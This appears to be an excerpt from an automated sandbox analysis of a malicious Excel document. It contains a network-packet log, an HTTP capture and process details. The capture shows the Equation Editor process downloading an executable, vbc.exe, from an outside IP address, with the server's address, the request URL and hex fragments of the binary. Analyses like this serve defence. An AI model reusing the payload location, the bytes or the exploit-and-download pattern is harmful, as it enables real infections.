    May 14, 2022 15:14:13.346817017 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.346822023 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.346858025 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.346863985 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.346900940 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.348901033 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.561881065 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.561920881 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.561950922 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.561955929 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.561980963 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.561989069 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562011957 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562041998 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562072039 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562082052 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562088013 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562092066 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562119007 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562123060 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562134981 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562144995 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562159061 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562177896 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562200069 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562206984 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562223911 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562231064 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562236071 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562254906 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562271118 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562284946 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562289000 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562309027 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562320948 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562335014 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562346935 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562360048 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562371969 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562393904 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562417984 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562424898 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562429905 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562457085 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562465906 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562489033 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562495947 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562527895 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562530041 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562552929 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562566996 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562580109 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.562582970 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.562623978 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.565936089 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.566618919 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.566653967 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.566685915 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.566705942 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.566716909 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.566729069 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.566732883 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.566751003 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.566760063 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.566781044 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.566787958 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.566809893 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.566821098 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.566836119 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.566847086 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.566864967 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.566875935 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.566890955 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.566904068 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.566916943 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.566929102 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.566942930 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.566955090 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.566967964 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.566978931 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.566993952 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.567006111 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.567018032 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.567033052 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.567044020 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.567054033 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.567069054 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.567085981 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.567095041 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.567099094 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.567118883 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.567133904 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.567143917 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.567157030 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.567168951 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.567181110 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.567194939 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.567204952 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.567218065 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.567234039 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.567245960 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.567250013 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.567285061 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.569566965 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.570949078 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.780494928 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.780534029 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.780550003 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.780565977 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.780585051 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.780602932 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.780621052 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.780638933 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.780687094 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.780715942 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.783710957 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.783737898 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.783763885 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.783787966 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.783796072 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.783813953 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.783814907 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.783823967 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.783837080 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.783839941 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.783855915 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.783869028 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.783876896 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.783898115 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.783899069 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.783910036 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.783921003 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.783927917 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.783941031 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.783950090 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.783962965 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.783966064 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.783982038 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.783992052 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.784004927 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.784006119 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.784022093 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.784034967 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.784044027 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.784049988 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.784076929 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.787097931 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.787120104 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.787136078 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.787225962 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.788511992 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.788682938 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.788712025 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.788738012 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.788763046 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.788774967 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.788789034 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.788820028 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.788840055 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.788862944 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.788875103 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.788883924 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.788897991 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.788906097 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.788912058 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.788927078 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.788948059 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.788953066 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.788959980 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.788969040 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.788975954 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.788989067 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.788992882 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.789009094 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.789026976 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.789031029 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.789041042 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.789052963 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.789068937 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.789072037 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.789088964 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.789093971 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.789100885 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.789113045 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.789134979 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.789134979 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.789144039 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.789156914 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.789159060 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.789192915 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.792794943 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.998696089 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998732090 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998748064 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998764038 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998780966 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998800039 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998819113 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998835087 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998857975 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998868942 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.998878002 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998897076 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.998900890 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998903990 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.998918056 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.998925924 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998929977 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.998945951 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998959064 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.998969078 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998974085 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.998989105 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998999119 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.999008894 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.999012947 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.999038935 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:16.539694071 CEST4917180192.168.2.22180.214.238.224
    • 180.214.238.224
    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.2249171180.214.238.22480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    TimestampkBytes transferredDirectionData
    May 14, 2022 15:14:12.468460083 CEST2OUTGET /__cloud_for_file/vbc.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 180.214.238.224
    Connection: Keep-Alive
    May 14, 2022 15:14:12.687846899 CEST3INHTTP/1.1 200 OK
    Date: Sat, 14 May 2022 13:14:18 GMT
    Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
    Last-Modified: Fri, 13 May 2022 09:07:10 GMT
    ETag: "38000-5dee0ffdad130"
    Accept-Ranges: bytes
    Content-Length: 229376
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload
    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ba 1f 7e 62 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 06 00 00 76 03 00 00 7c 03 00 00 00 00 00 ca 95 03 00 00 20 00 00 00 a0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 95 03 00 57 00 00 00 00 c0 03 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 0c 00 00 00 18 50 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 75 03 00 00 20 00 00 00 76 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 03 00 00 02 00 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 c8 05 00 00 00 c0 03 00 00 06 00 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 95 03 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 50 03 00 d4 44 00 00 03 00 02 00 03 00 00 06 08 3d 00 00 10 13 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 00 28 0b 00 00 06 00 2a 00 00 00 03 30 09 00 07 00 00 00 00 00 00 00 02 28 3e 00 00 0a 2a 00 13 30 08 00 36 02 00 00 01 00 00 11 2b 07 26 16 28 11 00 00 06 1a 28 11 00 00 06 1e 28 11 00 00 06 3a e9 01 00 00 18 45 01 00 00 00 f6 ff ff ff 17 2d 06 d0 03 00 00 06 26 26 00 17 28 18 00 00 06 20 79 e7 07 00 28 18 00 00 06 25 26 20 7e e7 07 00 28 18 00 00 06 25 26 28 7f 00 00 06 20 81 e7 07 00 28 18 00 00 06 20 88 e7 07 00 28 18 00 00 06 28 80 00 00 06 20 8b e7 07 00 28 18 00 00 06 20 8e e7 07 00 28 18 00 00 06 28 80 00 00 06 20 91 e7 07 00 28 18 00 00 06 20 94 e7 07 00 28 18 00 00 06 25 26 28 80 00 00 06 20 97 e7 07 00 28 18 00 00 06 25 26 20 a0 e7 07 00 28 18 00 00 06 28 80 00 00 06 0a 1f 0c 28 11 00 00 06 28 06 00 00 06 3a 0d 01 00 00 1a 45 01 00 00 00 f6 ff ff ff 26 1f 10 28 11 00 00 06 1f 14 28 11 00 00 06 39 19 01 00 00 26 06 28 a4 00 00 06 0b 1f 18 28 11 00 00 06 28 05 00 00 06 25 26 3a fe 00 00 00 1d 45 01 00 00 00 f6 ff ff ff 26 11 05 08 28 c4 00 00 06 09 1f 1c 28 11 00 00 06 14 14 11 06 28 d9 00 00 06 25 26 28 ba 00 00 06 26 1f 20 28 11 00 00 06 38 c6 00 00 00 1f 24 28 11 00 00 06 28 96 00 00 06 25 1f 28 28 11 00 00 06 11 04 a2 25 1f 2c 28 11 00 00 06 7e 3f 00 00 0a a2 25 1f 30 28 11 00 00 06 07 a2 25 1f 34 28 11 00 00 06
    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL~b.v| @ `pWP H.textu v `.relocx@B.rsrcz@@HPD="(*0(>*06+&(((:E-&&( y(%& ~(%&( ( (( ( (( ( (%&( (%& ((((:E&((9&(((%&:E&(((%&(& (8$((%((%,(~?%0(%4(
    May 14, 2022 15:14:12.687892914 CEST5INData Raw: 1f 38 28 11 00 00 06 8c 05 00 00 01 a2 13 06 1f 3c 28 11 00 00 06 28 06 00 00 06 2c 72 26 20 a3 e7 07 00 28 18 00 00 06 25 26 0c 20 d6 e7 07 00 28 18 00 00 06 25 26 0d 20 e9 e7 07 00 28 18 00 00 06 25 26 20 5a e8 07 00 28 18 00 00 06 20 6f e8 07
    Data Ascii: 8(<((,r& (%& (%& (%& Z( o(%&(%&+&@(+ (%&(w%&8ED(EfH(+*0+&L( (%& y( ~
    May 14, 2022 15:14:12.687918901 CEST6INData Raw: 2f 0b 18 45 01 00 00 00 f6 ff ff ff 2a 7e 02 00 00 04 03 02 16 06 28 47 00 00 0a 2a 00 00 13 30 05 00 56 00 00 00 07 00 00 11 7e 05 00 00 04 2d 4e 1b 45 01 00 00 00 f6 ff ff ff 17 2d 06 d0 16 00 00 06 26 72 85 00 00 70 0a 06 28 1d 00 00 0a 0b 28
    Data Ascii: /E*~(G*0V~-NE-&rp((AioB%&(o%&aj(*0(*0~ _-~X8~@_-8E-&~ _
    May 14, 2022 15:14:12.687942028 CEST7INData Raw: 06 32 bb 1c 45 01 00 00 00 f6 ff ff ff 06 11 0d 16 06 28 ac 00 00 06 11 0e 6a 59 69 28 c8 00 00 06 26 11 0a 11 0d 16 06 28 ac 00 00 06 25 26 11 0e 6a 59 69 28 91 00 00 06 13 10 7e 0a 00 00 04 11 10 16 11 10 28 97 00 00 06 69 28 d8 00 00 06 7e 0a
    Data Ascii: 2E(jYi(&(%&jYi(~(i(~j(~_9~-DE~ 3E~(iZ({+~~({~j(( (6%&(1
    May 14, 2022 15:14:12.906400919 CEST9INData Raw: 51 00 00 0a 25 26 13 10 16 13 11 38 2f 01 00 00 11 10 11 11 9a 0d 07 6f 55 00 00 0a 13 05 11 05 28 6a 00 00 06 25 26 69 13 06 11 06 28 8d 00 00 06 13 07 16 13 08 2b 17 11 07 11 08 11 05 11 08 9a 6f 59 00 00 0a 25 26 a2 11 08 17 58 13 08 11 08 11
    Data Ascii: Q%&8/oU(j%&i(+oY%&X2E~?oV%&s[o\%&1~]o^1~_o^1E~`o^1~ao^13E+~boc
    May 14, 2022 15:14:12.906440020 CEST10INData Raw: ff ff ff 00 28 23 00 00 06 2a 00 00 32 7e 5a 00 00 04 02 28 4c 00 00 06 2a 00 00 00 56 20 18 00 00 02 20 0a 00 00 0a 20 ff ff ff 00 28 23 00 00 06 2a 00 00 36 7e 5b 00 00 04 02 03 28 50 00 00 06 2a 00 00 56 20 19 00 00 02 20 0b 00 00 0a 20 ff ff
    Data Ascii: (#*2~Z(L*V (#*6~[(P*V (#*.~\(T*V (&*.~](X*V (#*:~^(\*V (&*.~_(`*V (#*2~`
    May 14, 2022 15:14:12.906470060 CEST12INData Raw: 41 00 00 02 20 29 00 00 0a 20 ff ff ff 00 28 23 00 00 06 2a 00 00 3e 7e 7c 00 00 04 02 03 04 05 28 d7 00 00 06 2a 1e 02 74 01 00 00 1b 2a 56 20 43 00 00 02 20 2a 00 00 0a 20 ff ff ff 00 28 23 00 00 06 2a 00 00 36 7e 7d 00 00 04 02 03 28 dc 00 00
    Data Ascii: A ) (#*>~|(*t*V C * (#*6~}(*V D + (#*2~~(*V E , (#*2~(*V F - (#*:~(*V G . (#*2~(*
    May 14, 2022 15:14:12.906497955 CEST13INData Raw: 1a 22 8b 01 e6 a3 78 60 06 51 14 c8 92 71 b8 5c de 5b 48 e1 02 a3 ed 9f b0 af 27 f6 d9 74 76 f6 73 a6 fa c2 58 e2 ae 89 1e e8 dd c0 2c 03 74 8c 23 59 6e 3e 7f b3 aa c6 49 57 fc 31 10 33 42 3e 23 4e c1 c8 34 50 4d 71 df ce 15 62 e4 2e af 7b a9 17
    Data Ascii: "x`Qq\[H'tvsX,t#Yn>IW13B>#N4PMqb.{] M*(:Crk<?;nn\N{x@x(L4EsL?edUbUhFR)@tb\QS&Ii4ztTmL ( (6iJi;n,8JIE(Y{run &H
    May 14, 2022 15:14:12.906524897 CEST14INData Raw: 04 e2 f1 7e 54 34 9c dc f0 5e ae 26 d4 50 47 cf af 16 b7 6d 34 0e a2 38 84 3b a4 94 dd f0 66 50 e0 d5 0d 64 bb f0 54 2a 63 22 87 81 3f f9 48 6b de c5 94 e3 fe c1 72 b7 91 a0 da 7a ae aa 8f 7d 1d 60 f4 8d 5c e1 46 6a 9e 8f 0b 3d d8 3b 40 52 b5 8b
    Data Ascii: ~T4^&PGm48;fPdT*c"?Hkrz}`\Fj=;@RL6"K4N.wQ/h$XlHx+"od+(|`$jaDQUMOH\IlyVj6+em,8Hu}NyeP
    May 14, 2022 15:14:12.906553984 CEST16INData Raw: c2 d3 ea ec 11 0e ce 4d 04 c7 02 c6 74 b5 2c 78 92 4c fa bf ba 29 e8 03 f4 c8 1c 58 3f 88 6b f4 de c5 ce 57 ba aa d2 14 fa 37 c5 38 df 34 3c cd a7 c4 3c 49 fe 23 be 01 5e b0 2b 5c 20 b2 2b 3e 7d b4 b9 bf f8 c5 3e f8 33 57 88 7a 26 18 7c 18 2a ed
    Data Ascii: Mt,xL)X?kW784<<I#^+\ +>}>3Wz&|*+q|2A;ZEDq?F{lN}6k)Y\Ks0M5F)n`-DKlC6X/U\6;K2BAbv7>c\L][5%{?.9Ob16?}(s#
    May 14, 2022 15:14:12.910749912 CEST17INData Raw: 08 12 1a 7e bb e4 91 91 93 e7 63 56 a2 6c 20 ad 57 be 9e aa 10 e3 e3 16 5c 7f 90 93 dc ae 69 6c 62 17 fb a0 17 14 5b df 11 ad f9 6e 01 0e 25 3f 5a 64 2a 30 fe 7f dd bd 25 95 ff 06 36 36 6c 4d 0f 76 d2 17 8a 1d 37 ac 0d 5b d1 a9 99 21 6e 0d de 6a
    Data Ascii: ~cVl W\ilb[n%?Zd*0%66lMv7[!njHNxXaY]5'LRZnL7;%xGiL'7rY494|ZVnBQPI-zaQ|F)9Tk\^FD_fnBe3'I 2&\:ur


    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:15:14:14
    Start date:14/05/2022
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Imagebase:0x13f780000
    File size:28253536 bytes
    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:2
    Start time:15:14:38
    Start date:14/05/2022
    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    Wow64 process (32bit):true
